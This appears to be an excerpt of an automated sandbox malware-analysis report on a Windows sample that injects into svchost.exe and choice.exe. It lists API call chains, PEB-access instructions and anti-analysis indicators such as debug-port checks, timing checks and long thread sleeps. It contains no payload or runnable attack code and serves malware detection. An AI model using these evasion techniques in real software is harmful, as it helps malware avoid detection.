          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SjhnWvlTMw.exe, 00000004.00000002.708576351890.0000000000D1E000.00000002.00000001.01000000.00000004.sdmp, SjhnWvlTMw.exe, 00000006.00000000.705443693958.0000000000D1E000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8EhMjL3yNF.exe, 00000000.00000003.703520236870.0000000004800000.00000004.00001000.00020000.00000000.sdmp, 8EhMjL3yNF.exe, 00000000.00000003.703518152149.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705288151288.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705284845460.0000000003200000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.0000000004F70000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.000000000509D000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705377011026.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705380810389.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8EhMjL3yNF.exe, 00000000.00000003.703520236870.0000000004800000.00000004.00001000.00020000.00000000.sdmp, 8EhMjL3yNF.exe, 00000000.00000003.703518152149.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.705378005011.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705288151288.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705284845460.0000000003200000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.0000000004F70000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.000000000509D000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705377011026.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705380810389.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: choice.exe, 00000005.00000002.708581961090.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.705676368924.000000003C50C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: choice.exe, 00000005.00000002.708581961090.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.705676368924.000000003C50C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: choice.pdb source: svchost.exe, 00000002.00000003.705345811797.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705345727655.000000000301A000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000003.707411095047.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: 8EhMjL3yNF.exeStatic PE information: real checksum: 0xa961f should be: 0x147438
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402040 push ebp; iretd 2_2_00402041
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B827 push ebp; ret 2_2_0040B82C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E905 push ebx; retf 2_2_0041E928
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D1B2 push esp; iretd 2_2_0040D1C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A254 push es; retf 2_2_0041A262
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406365 push ss; iretd 2_2_00406366
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402381 push ds; retf 2_2_00402389
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004034F0 push eax; ret 2_2_004034F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401480 push edx; retn AE6Ch2_2_00401938
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187F3 push ds; ret 2_2_00418803
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036308CD push ecx; mov dword ptr [esp], ecx2_2_036308D6
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeCode function: 4_2_03FE8E71 push eax; ret 4_2_03FE8E73
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeCode function: 4_2_03FE89B5 push edx; retf 4_2_03FE89B6
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeCode function: 4_2_03FE7488 push ecx; ret 4_2_03FE7490
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeAPI/Special instruction interceptor: Address: 440323C
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFA0FFCD144
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFA0FFCD604
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFA0FFCD764
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFA0FFCD324
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFA0FFCD364
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFA0FFCD004
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFA0FFCFF74
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFA0FFCD864
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671763 rdtsc 2_2_03671763
          Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 9193Jump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87307
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeAPI coverage: 3.7 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
          Source: C:\Windows\SysWOW64\choice.exe TID: 4188Thread sleep count: 120 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exe TID: 4188Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\choice.exe TID: 4188Thread sleep count: 9193 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exe TID: 4188Thread sleep time: -18386000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe TID: 4416Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_004788BD
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044BD27 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044BF8B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
          Source: firefox.exe, 00000008.00000002.705677467290.00000204FC56C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNNe
          Source: choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708578065752.000000000107F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeAPI call chain: ExitProcess graph end nodegraph_0-86434
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671763 rdtsc 2_2_03671763
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417383 LdrLoadDll,2_2_00417383
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_044034A8 mov eax, dword ptr fs:[00000030h]0_2_044034A8
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_04403508 mov eax, dword ptr fs:[00000030h]0_2_04403508
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_04401EB8 mov eax, dword ptr fs:[00000030h]0_2_04401EB8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h]2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h]2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h]2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h]2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h]2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h]2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h]2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h]2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h]2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h]2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h]2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h]2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h]2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h]2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE372 mov eax, dword ptr fs:[00000030h]2_2_036AE372
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE372 mov eax, dword ptr fs:[00000030h]2_2_036AE372
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE372 mov eax, dword ptr fs:[00000030h]2_2_036AE372
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE372 mov eax, dword ptr fs:[00000030h]2_2_036AE372
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0371 mov eax, dword ptr fs:[00000030h]2_2_036B0371
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0371 mov eax, dword ptr fs:[00000030h]2_2_036B0371
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365237A mov eax, dword ptr fs:[00000030h]2_2_0365237A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628347 mov eax, dword ptr fs:[00000030h]2_2_03628347
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628347 mov eax, dword ptr fs:[00000030h]2_2_03628347
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628347 mov eax, dword ptr fs:[00000030h]2_2_03628347
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A350 mov eax, dword ptr fs:[00000030h]2_2_0366A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668322 mov eax, dword ptr fs:[00000030h]2_2_03668322
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668322 mov eax, dword ptr fs:[00000030h]2_2_03668322
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668322 mov eax, dword ptr fs:[00000030h]2_2_03668322
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703336 mov eax, dword ptr fs:[00000030h]2_2_03703336
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365332D mov eax, dword ptr fs:[00000030h]2_2_0365332D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E328 mov eax, dword ptr fs:[00000030h]2_2_0362E328
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E328 mov eax, dword ptr fs:[00000030h]2_2_0362E328
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E328 mov eax, dword ptr fs:[00000030h]2_2_0362E328
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03629303 mov eax, dword ptr fs:[00000030h]2_2_03629303
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03629303 mov eax, dword ptr fs:[00000030h]2_2_03629303
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF30A mov eax, dword ptr fs:[00000030h]2_2_036EF30A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B330C mov eax, dword ptr fs:[00000030h]2_2_036B330C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B330C mov eax, dword ptr fs:[00000030h]2_2_036B330C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B330C mov eax, dword ptr fs:[00000030h]2_2_036B330C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B330C mov eax, dword ptr fs:[00000030h]2_2_036B330C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E310 mov eax, dword ptr fs:[00000030h]2_2_0364E310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E310 mov eax, dword ptr fs:[00000030h]2_2_0364E310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E310 mov eax, dword ptr fs:[00000030h]2_2_0364E310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366631F mov eax, dword ptr fs:[00000030h]2_2_0366631F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E3C0 mov eax, dword ptr fs:[00000030h]2_2_0362E3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E3C0 mov eax, dword ptr fs:[00000030h]2_2_0362E3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E3C0 mov eax, dword ptr fs:[00000030h]2_2_0362E3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C3C7 mov eax, dword ptr fs:[00000030h]2_2_0362C3C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036363CB mov eax, dword ptr fs:[00000030h]2_2_036363CB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036633D0 mov eax, dword ptr fs:[00000030h]2_2_036633D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036643D0 mov ecx, dword ptr fs:[00000030h]2_2_036643D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B43D5 mov eax, dword ptr fs:[00000030h]2_2_036B43D5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036393A6 mov eax, dword ptr fs:[00000030h]2_2_036393A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036393A6 mov eax, dword ptr fs:[00000030h]2_2_036393A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC3B0 mov eax, dword ptr fs:[00000030h]2_2_036AC3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03631380 mov eax, dword ptr fs:[00000030h]2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03631380 mov eax, dword ptr fs:[00000030h]2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03631380 mov eax, dword ptr fs:[00000030h]2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03631380 mov eax, dword ptr fs:[00000030h]2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03631380 mov eax, dword ptr fs:[00000030h]2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h]2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h]2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h]2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h]2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h]2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h]2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF38A mov eax, dword ptr fs:[00000030h]2_2_036EF38A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A390 mov eax, dword ptr fs:[00000030h]2_2_0365A390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A390 mov eax, dword ptr fs:[00000030h]2_2_0365A390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A390 mov eax, dword ptr fs:[00000030h]2_2_0365A390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B273 mov eax, dword ptr fs:[00000030h]2_2_0362B273
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B273 mov eax, dword ptr fs:[00000030h]2_2_0362B273
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B273 mov eax, dword ptr fs:[00000030h]2_2_0362B273
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C327E mov eax, dword ptr fs:[00000030h]2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C327E mov eax, dword ptr fs:[00000030h]2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C327E mov eax, dword ptr fs:[00000030h]2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C327E mov eax, dword ptr fs:[00000030h]2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C327E mov eax, dword ptr fs:[00000030h]2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C327E mov eax, dword ptr fs:[00000030h]2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ED270 mov eax, dword ptr fs:[00000030h]2_2_036ED270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F124C mov eax, dword ptr fs:[00000030h]2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F124C mov eax, dword ptr fs:[00000030h]2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F124C mov eax, dword ptr fs:[00000030h]2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F124C mov eax, dword ptr fs:[00000030h]2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF247 mov eax, dword ptr fs:[00000030h]2_2_036EF247
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365F24A mov eax, dword ptr fs:[00000030h]2_2_0365F24A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0227 mov eax, dword ptr fs:[00000030h]2_2_036B0227
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0227 mov eax, dword ptr fs:[00000030h]2_2_036B0227
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0227 mov eax, dword ptr fs:[00000030h]2_2_036B0227
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A22B mov eax, dword ptr fs:[00000030h]2_2_0366A22B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A22B mov eax, dword ptr fs:[00000030h]2_2_0366A22B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A22B mov eax, dword ptr fs:[00000030h]2_2_0366A22B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650230 mov ecx, dword ptr fs:[00000030h]2_2_03650230
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A200 mov eax, dword ptr fs:[00000030h]2_2_0362A200
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362821B mov eax, dword ptr fs:[00000030h]2_2_0362821B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BB214 mov eax, dword ptr fs:[00000030h]2_2_036BB214
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BB214 mov eax, dword ptr fs:[00000030h]2_2_036BB214
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036272E0 mov eax, dword ptr fs:[00000030h]2_2_036272E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h]2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h]2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h]2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h]2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h]2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h]2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036382E0 mov eax, dword ptr fs:[00000030h]2_2_036382E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036382E0 mov eax, dword ptr fs:[00000030h]2_2_036382E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036382E0 mov eax, dword ptr fs:[00000030h]2_2_036382E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036382E0 mov eax, dword ptr fs:[00000030h]2_2_036382E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D2EC mov eax, dword ptr fs:[00000030h]2_2_0362D2EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D2EC mov eax, dword ptr fs:[00000030h]2_2_0362D2EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036532C5 mov eax, dword ptr fs:[00000030h]2_2_036532C5
